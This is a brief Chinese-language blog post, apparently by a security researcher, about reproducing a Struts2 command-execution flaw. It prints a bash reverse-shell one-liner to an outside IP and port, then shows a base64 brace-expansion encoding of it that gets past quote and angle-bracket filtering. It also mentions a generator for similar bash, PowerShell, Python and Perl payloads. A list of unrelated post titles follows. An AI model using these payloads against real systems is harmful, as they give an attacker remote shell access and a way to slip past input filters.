0x01
在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"、<>等字符出现了问题。
0x02
经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 0>&1'就可以用bash -c {echo,YmFzaCAtYyAnc2ggLWkgPiYgL2Rldi90Y3AvMS4xLjEuMS82NjYgMD4mMSc=}|{base64,-d}|{bash,-i}绕过
0x03
当然,方式有多重,这里简单的写了一个网页来生成这些payload,不仅可以生成bash,powershell,python,perl都支持。
用chatgpt做 blackhat asia-2023 学习委员 
安全圈微信群聊摸鱼报告.md 
w9scan 深入浅出(一) 使用 
多人协作下用github action检查和发布代码 
w10scan进行一次粗糙的安全情报 
w9scan 1.5 编写经历 
像fofa一样解析RDP信息,RDP提取操作系统,RDP登录截屏 (Golang实现)
发表评论